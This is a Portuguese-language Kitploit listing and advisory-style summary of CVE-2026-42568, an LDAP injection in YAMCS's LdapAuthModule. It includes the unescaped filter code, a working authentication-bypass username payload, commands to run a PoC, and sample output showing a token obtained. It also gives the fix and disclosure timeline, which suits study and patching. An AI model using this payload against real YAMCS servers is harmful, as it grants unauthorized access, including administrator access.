Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-42568 — Existe uma vulnerabilidade de injeção LDAP em org.yamcs.security.LdapAuthModule. O parâmetro username é inserido diretamente nos filtros de busca LDAP sem escape conforme RFC 4515, permitindo bypass de autenticação. | Kitploit
Ferramentas/GitHubGitHub/ex-cal1bur/cve-2026-42568
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAutenticaçãoAprendizado e Educação
GitHubex-cal1bur/cve-2026-42568

CVE-2026-42568

Existe uma vulnerabilidade de injeção LDAP em org.yamcs.security.LdapAuthModule. O parâmetro username é inserido diretamente nos filtros de busca LDAP sem escape conforme RFC 4515, permitindo bypass de autenticação.

Ver Repositório
1há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-42568 — Injeção LDAP no LdapAuthModule do YAMCS

Resumo

Existe uma vulnerabilidade de injeção LDAP em org.yamcs.security.LdapAuthModule. O parâmetro de nome de usuário é inserido diretamente nos filtros de busca LDAP sem escape RFC 4515, permitindo contornar a autenticação.

CampoValor
CVECVE-2026-42568
SeveridadeMÉDIA
CWECWE-90: Neutralização Incorreta de Elementos Especiais em Consulta LDAP
Afetadoyamcs-core < 5.12.7 (com autenticação LDAP configurada)
Corrigido emyamcs-core 5.12.7
ComunicadoGHSA-cqh3-jg8p-336j

Detalhes da Vulnerabilidade

Causa raiz (LdapAuthModule.java):

root@kitploit:~
var filter = userFilter.replace("{0}", username);
// nome de usuário inserido diretamente — sem escape RFC 4515

Com um userFilter típico de (uid={0}), um nome de usuário malicioso quebra a estrutura do filtro:

root@kitploit:~
Entrada:  *)(uid=*))(|(uid=*
Filtro: (uid=*)(uid=*))(|(uid=*)
Resultado: Correspondência universal — autenticação contornada

Prova de Conceito

root@kitploit:~
pip install requests
python3 poc.py http://localhost:8090

Saída esperada em instância vulnerável (com LDAP configurado):

root@kitploit:~
[1] Bypass universal (qualquer conta)
     Nome de usuário: *)(uid=*))(|(uid=*
     Senha: qualquer coisa
     Resultado:   HTTP 200
     [!!!] AUTENTICAÇÃO CONTORNADA
     [!!!] Token recebido: eyJhbGciOiJSUzI1NiJ9...

Nota: Esta vulnerabilidade afeta apenas instâncias YAMCS com LdapAuthModule configurado. Instalações padrão usando autenticação embutida não são afetadas.

Impacto

Um atacante não autenticado que consiga alcançar o servidor YAMCS pode contornar completamente a autenticação quando a autenticação LDAP está configurada, obtendo acesso como qualquer usuário, incluindo administradores.

Correção

Atualize para yamcs-core >= 5.12.7.

A correção aplica escape RFC 4515 ao nome de usuário antes de construir o filtro LDAP.

Cronograma

DataEvento
2026-05Vulnerabilidade reportada
2026-05-26Correção lançada no yamcs-core 5.12.7
2026-05-26Comunicado público publicado

Pesquisador

Daniel Miranda Barcelona (Excal1bur)

  • GitHub: https://github.com/ex-cal1bur
  • LinkedIn: https://linkedin.com/in/daniel-miranda-barcelona
  • Blog: https://thedumpster.es
Baixar ferramenta